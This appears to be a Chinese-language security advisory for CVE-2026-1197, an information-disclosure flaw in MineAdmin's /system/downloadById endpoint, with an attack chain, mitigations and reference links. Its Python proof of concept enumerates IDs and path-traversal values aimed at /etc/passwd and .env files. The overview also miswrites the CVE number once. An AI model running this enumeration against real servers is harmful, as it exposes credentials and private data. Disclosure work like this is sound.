CVE-2026-1197 MineAdmin 1.x/2.x /system/downloadById 信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-1197

漏洞类型

信息泄露

CVSS评分

3.1 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MineAdmin 1.x/2.x

漏洞概述

CVE-2026-2026-1197是MineAdmin框架中的一个信息泄露漏洞。该漏洞存在于/system/downloadById端点，攻击者可以通过操纵ID参数来未经授权访问敏感文件或数据。MineAdmin是一个基于现代PHP框架开发的企业级后台管理系统，广泛应用于各类Web应用场景。该漏洞的CVSS评分为3.1，属于低危级别，但由于攻击复杂度较高且需要低权限认证，实际利用难度较大。然而，由于漏洞利用代码已经公开，攻击者可能在特定场景下进行针对性攻击。此漏洞可能导致系统配置信息、用户数据或其他敏感文件被泄露，对企业数据安全构成潜在威胁。

技术细节

该漏洞位于MineAdmin的/system/downloadById功能模块中。漏洞的根本原因在于该接口对用户输入的ID参数缺乏充分的权限验证和输入过滤。攻击者可以通过构造恶意的ID参数值，绕过正常的业务逻辑访问控制，获取本应受保护的文件内容或数据。具体攻击方式为：攻击者使用低权限账号登录系统后，通过修改downloadById接口的ID参数值为目标文件的标识符或路径，系统在未正确验证用户是否有权访问该文件的情况下，直接返回文件内容。由于该接口设计用于文件下载功能，攻击者可以遍历不同的ID值来获取系统中的各类敏感文件，包括但不限于配置文件、数据库凭证、用户信息等。漏洞利用复杂度为高，需要攻击者具备一定的系统知识来识别有效的ID值和目标文件。

攻击链分析

STEP 1

步骤1

攻击者获取MineAdmin系统的低权限账号或通过其他方式获取有效的认证凭据

STEP 2

步骤2

攻击者访问/system/downloadById接口，通过枚举不同的ID参数值来探测可访问的文件

STEP 3

步骤3

利用路径遍历或ID遍历技术，攻击者尝试访问系统配置文件、数据库连接信息或其他敏感文件

STEP 4

步骤4

成功获取敏感信息后，攻击者可能利用这些数据进行进一步的攻击，如横向移动或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-1197 PoC - MineAdmin Information Disclosure
# Target: /system/downloadById endpoint

target_url = "http://target-server/api/system/downloadById"

# Test with different ID values to enumerate files
test_ids = [1, 2, 3, 4, 5, "config", "../etc/passwd", "../../../.env"]

for test_id in test_ids:
    params = {"id": test_id}
    headers = {
        "Authorization": "Bearer <low_privilege_token>",
        "User-Agent": "Mozilla/5.0"
    }
    
    try:
        response = requests.get(target_url, params=params, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] ID {test_id}: Possible file disclosure")
            print(f"Response headers: {response.headers}")
            print(f"Content preview: {response.text[:200]}")
            print("-" * 50)
        elif response.status_code == 403:
            print(f"[-] ID {test_id}: Access denied")
        else:
            print(f"[*] ID {test_id}: Status {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error testing ID {test_id}: {e}")

print("\n[!] Note: This PoC requires a valid low-privilege authentication token")

影响范围

MineAdmin 1.x 所有版本

MineAdmin 2.x 所有版本

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解风险：1) 限制/system/downloadById接口的访问权限，仅允许管理员访问；2) 实施IP白名单策略，限制访问来源；3) 启用请求速率限制，防止暴力枚举；4) 加强对低权限账户的监控，及时发现异常访问行为；5) 考虑暂时禁用该功能模块，待官方修复后再重新启用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1197
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1197
3 Details https://www.cvedetails.com/cve/CVE-2026-1197/
4 VulDB https://vuldb.com/cve/CVE-2026-1197
5 Link https://github.com/SourByte05/MineAdmin-Vulnerability/issues/2
6 Link https://vuldb.com/?ctiid.341782
7 Link https://vuldb.com/?id.341782
8 Link https://vuldb.com/?submit.734274